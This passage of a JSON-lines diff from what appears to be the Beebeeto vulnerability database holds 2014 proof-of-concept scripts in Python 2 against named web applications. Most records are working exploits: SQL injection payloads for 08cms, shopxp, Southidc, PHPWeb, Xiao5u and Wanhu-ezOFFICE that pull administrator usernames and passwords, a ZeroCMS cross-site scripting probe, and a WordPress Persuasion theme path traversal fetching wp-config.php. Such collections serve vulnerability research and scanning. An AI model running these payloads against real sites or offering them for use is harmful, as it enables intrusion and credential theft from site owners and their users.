\u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n            'type': 'SQL Injection',# \u6f0f\u6d1e\u7c7b\u578b\r\n            'tag': ['SQL Injection', '08cms\u6f0f\u6d1e', '\u4fe1\u606f\u6cc4\u9732'],  # \u6f0f\u6d1e\u76f8\u5173tag\r\n            'desc': '\u6f0f\u6d1e\u51fa\u73b0\u5728/include/paygate/alipay/pays.php\u6587\u4ef6',  # \u6f0f\u6d1e\u63cf\u8ff0\r\n            'references': ['http://www.cnseay.com/3333/'],  # \u53c2\u8003\u94fe\u63a5\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = (\"/include/paygate/alipay/pays.php?out_trade_no=22'%20AND%20(SELECT%201%20\"\r\n                   \"FROM(SELECT%20COUNT(*),CONCAT((SELECT%20concat(0x3a,mname,0x3a,password,\"\r\n                   \"0x3a,email,0x3a)%20from%20cms_members%20limit%200,1),FLOOR(RAND(0)*2))X%20\"\r\n                   \"FROM%20information_schema.tables%20GROUP%20BY%20X)a)%20AND'\")\r\n        verify_url = args['options']['target'] + payload\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(urllib2.Request(verify_url)).read()\r\n        pattern = re.compile(r\".*?Duplicate\\s*entry\\s*[']:(?P<username>[^:]+):(?P<password>[^:]+)\", re.I|re.S)#\u5ffd\u7565\u5927\u5c0f\u5199\u3001\u5355\u884c\u6a21\u5f0f\r\n        match = pattern.match(content)\r\n        if match == None:\r\n            args['success'] = False\r\n            return args\r\n        username = match.group(\"username\")\r\n        password = match.group(\"password\")\r\n        args['success'] = True\r\n        args['poc_ret']['vul_url'] = verify_url\r\n        args['poc_ret']['Username'] = username\r\n        args['poc_ret']['Password'] = password\r\n        return args\r\n\r\n    exploit = verify\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())\r\n", "desc": "\u6f0f\u6d1e\u51fa\u73b0\u5728/include/paygate/alipay/pays.php\u6587\u4ef6", "app_name": "08cms", "id": "poc-2014-0043", "layer4_protocol": null}
+{"create_date": "2014-09-30 21:03:29", "name": "shopxp v7.4 /textbox2.asp SQL\u6ce8\u5165\u6f0f\u6d1e EXP", "level": "\u4e2d\u5371", "batchable": 1, "author": "Bug", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "SQL Injection, shopxp\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0040',           # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n            'name': 'shopxp v7.4 /textbox2.asp SQL\u6ce8\u5165\u6f0f\u6d1e EXP',  # \u540d\u79f0\r\n            'author': 'Bug',                   # \u4f5c\u8005\r\n            'create_date': '2014-09-29',    # \u7f16\u5199\u65e5\u671f\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',  # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n            'port': [80],  # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n            'layer4_protocol': ['tcp'],  # \u8be5\u534f\u8bae\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'xpshop',  # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n            'vul_version': ['7.4'],  # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n            'type': 'SQL Injection',  # \u6f0f\u6d1e\u7c7b\u578b\r\n            'tag': ['SQL Injection', 'shopxp\u6f0f\u6d1e'],  # \u6f0f\u6d1e\u76f8\u5173tag\r\n            'desc': 'N/A',  # \u6f0f\u6d1e\u63cf\u8ff0\r\n            'references': ['http://www.webshell.cc/1154.html'],  # \u53c2\u8003\u94fe\u63a5\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        payload = (\"/TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select\"\r\n               \"%201,2,admin%2bpassword,4,5,6,7%20from%20shopxp_admin\")\r\n        verify_url = args['options']['target'] + payload\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(urllib2.Request(verify_url)).read()\r\n        pattern = re.compile(r'.*?<body[^>]*?>(?P<account>[^<>]*?)</body>',re.I|re.S)\r\n        match = pattern.match(content)\r\n        if match == None or match.group('account').strip()==\"\":\r\n            args['success'] = False\r\n            return args\r\n        account = match.group('account').strip()\r\n        username = account[:-16]\r\n        password = account[-16:]\r\n        args['success'] = True\r\n        args['poc_ret']['vul_url'] = verify_url\r\n        args['poc_ret']['Username'] = username\r\n        args['poc_ret']['Password'] = password\r\n        return args\r\n\r\n    exploit = verify\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "N/A", "app_name": "Other", "id": "poc-2014-0040", "layer4_protocol": null}
+{"create_date": "2014-09-29 15:55:32", "name": "ZeroCMS 1.0 /zero_transact_user.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC", "level": "\u4f4e\u5371", "batchable": 1, "author": "1024", "rank": 2, "port": null, "vul_type": "\u8de8\u7ad9\u6f0f\u6d1e", "tag": "ZeroCMS,xss,\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0039',\r\n            'name': 'ZeroCMS 1.0 /zero_transact_user.php \u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e POC',\r\n            'author': '1024',\r\n            'create_date': '2014-09-29',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'ZeroCMS', \r\n            'vul_version': ['1.0'],\r\n            'type': 'Cross Site Scripting',\r\n            'tag': ['ZeroCMS', 'xss', '\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e'],\r\n            'desc': 'ZeroCMS\u7528\u6237\u6ce8\u518c\u9875\u9762zero_transact_user.php\u8868\u5355\u5b8c\u5168\u6ca1\u8fdb\u884c\u8fc7\u6ee4\u3002',\r\n            'references': ['http://www.exploit-db.com/exploits/34170/',\r\n            ],\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        verify_url = args['options']['target'] + '/zero_transact_user.php'\r\n        verify_data = 'name=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&email=%3Cscript%3E'\\\r\n                'alert%28123%29%3C%2Fscript%3E&password_1=%3Cscript%3Ealert%28123%29%3C%2Fscript'\\\r\n                '%3E&password_2=%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&action=Create+Account'\r\n        request = urllib2.Request(verify_url, data=verify_data)\r\n        response = urllib2.urlopen(request)\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n            print '[*] POST: ' + verify_data\r\n        content = response.read()\r\n        if \"Duplicate entry '<script>alert(123)</script>' for key 'email'\" in content:\r\n            args['success'] = True\r\n            args['poc_ret']['xss_url'] = verify_url\r\n            return args\r\n        else:\r\n            args['success'] = False\r\n            return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())\r\n", "desc": "ZeroCMS\u7528\u6237\u6ce8\u518c\u9875\u9762zero_transact_user.php\u8868\u5355\u5b8c\u5168\u6ca1\u8fdb\u884c\u8fc7\u6ee4\u3002", "app_name": "ZeroCMS", "id": "poc-2014-0039", "layer4_protocol": null}
+{"create_date": "2014-09-29 14:45:51", "name": "Southidc\u5357\u65b9\u6570\u636e v11.0 /NewsType.asp SQL\u6ce8\u5165\u6f0f\u6d1e EXP", "level": "\u4e2d\u5371", "batchable": 1, "author": "Bug", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "southidc,SQL\u6ce8\u5165\u6f0f\u6d1e,SQL Injection,\u5357\u65b9\u6570\u636e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0036',           # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n            'name': 'Southidc\u5357\u65b9\u6570\u636e v11.0 /NewsType.asp SQL\u6ce8\u5165\u6f0f\u6d1e EXP',  # \u540d\u79f0\r\n            'author': 'Bug',                   # \u4f5c\u8005\r\n            'create_date': '2014-09-28',    # \u7f16\u5199\u65e5\u671f\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',  # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n            'port': [80],  # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n            'layer4_protocol': ['tcp'],  # \u8be5\u534f\u8bae\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'southidc',  # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n            'vul_version': ['11.0'],  # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n            'type': 'SQL Injection',  # \u6f0f\u6d1e\u7c7b\u578b\r\n            'tag': ['southidc', 'SQL\u6ce8\u5165\u6f0f\u6d1e', 'SQL Injection', '\u5357\u65b9\u6570\u636e'],  # \u6f0f\u6d1e\u76f8\u5173tag\r\n            'desc': 'southidc v10.0\u5230v11.0\u7248\u672c\u4e2dNewsType.asp\u6587\u4ef6\u5bf9SmallClass\u53c2\u6570\u6ca1\u6709\u9002\u5f53\u8fc7\u6ee4\uff0c\u5bfc\u81f4SQL\u6ce8\u5165\u6f0f\u6d1e\u3002',  # \u6f0f\u6d1e\u63cf\u8ff0\r\n            'references': ['http://sebug.net/vuldb/ssvid-62399'],  # \u53c2\u8003\u94fe\u63a5\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        exp = (\"/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword\"\r\n               \",2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201\"\r\n               \"=2%20and%20''='\")\r\n        verify_url = args['options']['target'] + exp\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(urllib2.Request(verify_url)).read()\r\n        pattern = re.compile(r'.*?\\\">(?P<username>[a-zA-Z0-9]+)\\|(?P<password>[a-zA-Z0-9]+)',re.I|re.S)\r\n        match = pattern.match(content)\r\n        if match == None:\r\n            args['success'] = False\r\n            return args\r\n        username = match.group(\"username\")\r\n        password = match.group(\"password\")\r\n        args['success'] = True\r\n        args['poc_ret']['vul_url'] = verify_url\r\n        args['poc_ret']['Username'] = username\r\n        args['poc_ret']['Password'] = password\r\n        return args\r\n\r\n    exploit = verify\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())\r\n", "desc": "southidc v10.0\u5230v11.0\u7248\u672c\u4e2dNewsType.asp\u6587\u4ef6\u5bf9SmallClass\u53c2\u6570\u6ca1\u6709\u9002\u5f53\u8fc7\u6ee4\uff0c\u5bfc\u81f4SQL\u6ce8\u5165\u6f0f\u6d1e\u3002", "app_name": "Southidc", "id": "poc-2014-0036", "layer4_protocol": null}
+{"create_date": "2014-09-28 16:06:23", "name": "PHPWeb 2.0.5 \u4f2a\u9759\u6001 SQL\u6ce8\u5165 POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "Bug", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "phpweb,SQL Injection,phpweb\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0034',           # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n            'name': 'PHPWeb 2.0.5 \u4f2a\u9759\u6001 SQL\u6ce8\u5165 POC',  # \u540d\u79f0\r\n            'author': 'Bug',                   # \u4f5c\u8005\r\n            'create_date': '2014-09-28',    # \u7f16\u5199\u65e5\u671f\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',  # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n            'port': [80],  # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n            'layer4_protocol': ['tcp'],  # \u8be5\u534f\u8bae\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'PHPWeb',  # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n            'vul_version': ['2.0.5'],  # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n            'type': 'SQL Injection',  # \u6f0f\u6d1e\u7c7b\u578b\r\n            'tag': ['phpweb', 'SQL Injection', 'phpweb\u6f0f\u6d1e'],  # \u6f0f\u6d1e\u76f8\u5173tag\r\n            'desc': 'N/A',  # \u6f0f\u6d1e\u63cf\u8ff0\r\n            'references': ['http://blog.163.com/sjg_admin/blog/static/22682017120139192446513/'],  # \u53c2\u8003\u94fe\u63a5\r\n        },\r\n    }\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        verify_url = args['options']['target'] + \"/news/html/?410'union/**/select/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),0x3a,(select/**/concat(user,0x3a,password)/**/from/**/pwn_base_admin/**/limit/**/0,1),0x3a)a/**/from/**/information_schema.tables/**/group/**/by/**/a)b/**/where'1'='1.html\"\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = urllib2.urlopen(urllib2.Request(verify_url)).read()\r\n        if content:\r\n            pattern = re.compile(r\".*?Duplicate\\s*entry\\s*[']?[0-9]*:(?P<username>[^:]+):(?P<password>[^:]+)\",re.I|re.S)\r\n            match = pattern.match(content)\r\n            if match == None:\r\n                args['success'] = False\r\n                return args\r\n            username = match.group('username')\r\n            password = match.group('password')\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n            args['poc_ret']['Username'] = username\r\n            args['poc_ret']['Password'] = password\r\n            return args\r\n        args['success'] = False\r\n        return args\r\n\r\n    exploit = verify\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "N/A", "app_name": "phpweb", "id": "poc-2014-0034", "layer4_protocol": null}
+{"create_date": "2014-09-27 16:42:03", "name": "\u6821\u65e0\u5fe7\u5efa\u7ad9\u7cfb\u7edf /TeachView.asp SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "beeOver", "rank": 4, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "Xiao5u,TeachView.asp,Sql injection", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport time\r\nimport urllib2\r\nimport urllib\r\nimport cookielib\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0032',# \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n            'name': '\u6821\u65e0\u5fe7\u5efa\u7ad9\u7cfb\u7edf /TeachView.asp SQL\u6ce8\u5165\u6f0f\u6d1e POC',  # \u540d\u79f0\r\n            'author': 'beeOver',  # \u4f5c\u8005\r\n            'create_date': '2014-09-26',  # \u7f16\u5199\u65e5\u671f\r\n            },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',  # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n            'port': [80],  # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n            'layer4_protocol': ['tcp'],  # \u8be5\u534f\u8bae\r\n            },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Xiao5u',  # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n            'vul_version': ['\u975e\u5546\u4e1a\u6388\u6743\u6240\u6709\u7248\u672c'],  # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n            'type': 'SQL Injection',  # \u6f0f\u6d1e\u7c7b\u578b\r\n            'tag': ['Xiao5u', 'TeachView.asp', 'Sql injection'],  # \u6f0f\u6d1e\u76f8\u5173tag\r\n            'desc': 'Xiao5u cms website have sql injection error.',  # \u6f0f\u6d1e\u63cf\u8ff0\r\n            'references': ['http://wooyun.org/bugs/wooyun-2014-065350',  # \u53c2\u8003\u94fe\u63a5\r\n                ],\r\n            },\r\n        }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        attack_url_base = args['options']['target'] + \"/TeachView.asp\"\r\n        attack_url = attack_url_base + \"?id=99999999999%27\"\r\n        user_agent = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36'}\r\n        request = urllib2.Request(attack_url,headers=user_agent)\r\n        error_string = \"Microsoft OLE DB Provider for ODBC Drivers\"\r\n        error_num = \"80040e14\"\r\n        error_detail = \"[Microsoft][ODBC Microsoft Access Driver]\"\r\n\r\n        try:\r\n            response = urllib2.urlopen(request)\r\n        except urllib2.URLError as e:\r\n            if hasattr(e, 'code'):\r\n                if e.getcode() == 500:\r\n                    content = e.read()\r\n                    if error_num in content and error_string in content and error_detail in content:\r\n                    #\u5982\u679c\u62a5500\u9519\u8bef\u4e14\u51fa\u73b0\"[Microsoft][ODBC Microsoft Access Driver] \u5b57\u7b26\u4e32\u7684\u8bed\u6cd5\u9519\u8bef \u5728\u67e5\u8be2\u8868\u8fbe\u5f0f 'id=59'' \u4e2d\u3002\"\u5219\u8bf4\u660e\u6f0f\u6d1e\u5b58\u5728\r\n                        args['success'] = True\r\n                        args['poc_ret']['vul_url'] = attack_url\r\n                        args['poc_ret']['tips'] = \"This website must have vulnerabilities, you can use sqlmap detect to get more information. \"\r\n                        #\u5982\u679c\u6f0f\u6d1e\u5b58\u5728\uff0c\u5219\u5efa\u8bae\u4f7f\u7528sqlmap\u7b49\u5de5\u5177\u8fdb\u884c\u8be6\u7ec6\u7684\u68c0\u6d4b\r\n                        return args\r\n\r\n        args[\"success\"] = False\r\n        args['poc_ret']['tips'] = \"May be this website not have this bug.\"\r\n        return args\r\n\r\n    exploit = verify\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())\r\n", "desc": "Xiao5u cms website have sql injection error.", "app_name": "Other", "id": "poc-2014-0032", "layer4_protocol": null}
+{"create_date": "2014-09-25 17:46:15", "name": "Wanhu-ezOFFICE /defaultroot/GraphReportAction.do SQL\u6ce8\u5c04\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "W_HHH", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "Wanhu,Wanhu-ezOFFICE", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2,urllib\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0030',  # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n            'name': 'Wanhu-ezOFFICE /defaultroot/GraphReportAction.do SQL\u6ce8\u5c04\u6f0f\u6d1e POC',  # \u540d\u79f0\r\n            'author': 'W_HHH',  # \u4f5c\u8005\r\n            'create_date': '2014-09-25',  # \u7f16\u5199\u65e5\u671f\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',  # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n            'port': [80],  # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n            'layer4_protocol': ['tcp'],  # \u8be5\u534f\u8bae\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Wanhu-ezOFFICE',  # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n            'vul_version': ['*'],  # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n            'type': 'SQL Injection',  # \u6f0f\u6d1e\u7c7b\u578b\r\n            'tag': ['Wanhu', 'Wanhu-ezOFFICE'],  # \u6f0f\u6d1e\u76f8\u5173tag\r\n            'desc': 'Wanhu-ezOFFICE  /defaultroot/GraphReportAction.do SQL\u6ce8\u5c04\u6f0f\u6d1e\u3002',  # \u6f0f\u6d1e\u63cf\u8ff0\r\n            'references': ['http://www.wooyun.org/bugs/wooyun-2014-064324/',  # \u53c2\u8003\u94fe\u63a5\r\n            ],\r\n        },\r\n    }\r\n\r\n    @staticmethod\r\n    def post(url, data):\r\n        req = urllib2.Request(url)\r\n        data = urllib.urlencode(data)\r\n        #enable cookie\r\n        opener = urllib2.build_opener(urllib2.HTTPCookieProcessor())\r\n        response = opener.open(req, data)\r\n        return response.read()\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        file_path = \"/defaultroot/GraphReportAction.do?action=showResult\"\r\n        verify_url = args['options']['target'] + file_path\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n\r\n        reinfo = '<textarea name=\"dataSQL\" rows=\"5\" style=\"width:100%\" readonly></textarea>'\r\n        response = urllib2.urlopen(verify_url).read()\r\n        match_hash = re.compile(reinfo)\r\n        form_hash = match_hash.findall(response)\r\n        if not form_hash:\r\n            args['success'] = False\r\n            return args\r\n\r\n        # execution sql\r\n        payload = {'dataSQL' : 'select USERACCOUNTS,USERPASSWORD from org_employee where EMP_ID=0'}\r\n        response = cls.post(verify_url, payload)\r\n        match_hash = re.compile('<td class=\"listTableLine2\">.*?</td>')\r\n        form_hash = match_hash.findall(response)\r\n        if len(form_hash) != 2:\r\n            args['success'] = False\r\n            return args\r\n\r\n        # get admin user and password\r\n        args['success'] = True\r\n        args['poc_ret']['Admin-username'] = form_hash[0][form_hash[0].find('\">') + 2:].rstrip('</td>')\r\n        args['poc_ret']['Admin-password'] = form_hash[1][form_hash[0].find('\">') + 2:].rstrip('</td>')\r\n\r\n        return args\r\n\r\n    exploit = verify\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())\r\n", "desc": "Wanhu-ezOFFICE  /defaultroot/GraphReportAction.do SQL\u6ce8\u5c04\u6f0f\u6d1e\u3002", "app_name": "Other", "id": "poc-2014-0030", "layer4_protocol": null}
+{"create_date": "2014-09-25 14:40:55", "name": "Wordpress Persuasion Theme 2.x \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "t0nyhj", "rank": 4, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "Wordpress,Presuasion Theme,\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2014-0029',  # \u7531Beebeeto\u5b98\u65b9\u7f16\u8f91\r\n            'name': 'Wordpress Persuasion Theme 2.x \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d POC',  # \u540d\u79f0\r\n            'author': 't0nyhj',  # \u4f5c\u8005\r\n            'create_date': '2014-09-25',  # \u7f16\u5199\u65e5\u671f\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',  # \u8be5\u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u534f\u8bae\u540d\u79f0\r\n            'port': [80],  # \u8be5\u534f\u8bae\u5e38\u7528\u7684\u7aef\u53e3\u53f7\uff0c\u9700\u4e3aint\u7c7b\u578b\r\n            'layer4_protocol': ['tcp'],  # \u8be5\u534f\u8bae\u6240\u4f7f\u7528\u7684\u7b2c\u4e09\u5c42\u534f\u8bae\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Wordpress Persuasion Theme',  # \u6f0f\u6d1e\u6240\u6d89\u53ca\u7684\u5e94\u7528\u540d\u79f0\r\n            'vul_version': ['2.x'],  # \u53d7\u6f0f\u6d1e\u5f71\u54cd\u7684\u5e94\u7528\u7248\u672c\r\n            'type': 'Arbitrary File Download',  # \u6f0f\u6d1e\u7c7b\u578b\r\n            'tag': ['Wordpress', 'Persuasion Theme', '\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e'],  # \u6f0f\u6d1e\u76f8\u5173tag\r\n            'desc': 'Wordpress Persuasion Theme 2.x \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d \uff0c\u901a\u8fc7\u6b64\u6f0f\u6d1e\u53ef\u4ee5\u4e0b\u8f7d\u670d\u52a1\u5668\u4e0a\u7684\u4efb\u610f\u53ef\u8bfb\u6587\u4ef6\u3002',  # \u6f0f\u6d1e\u63cf\u8ff0\r\n            'references': ['http://www.exploit-db.com/exploits/30443/',  # \u53c2\u8003\u94fe\u63a5\r\n                           ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):  # \u5b9e\u73b0\u9a8c\u8bc1\u6a21\u5f0f\u7684\u4e3b\u51fd\u6570\r\n        vul_url = '{url}/wp-content/themes/persuasion/lib/scripts/dl-skin.php'.format(url=args['options']['target'])\r\n        payload = {'_mysite_download_skin':'../../../../../wp-config.php', '_mysite_delete_skin_zip':''}\r\n        data = urllib.urlencode(payload)\r\n        if args['options']['verbose']:\r\n            print '[*] {url} - Getting wp-config.php 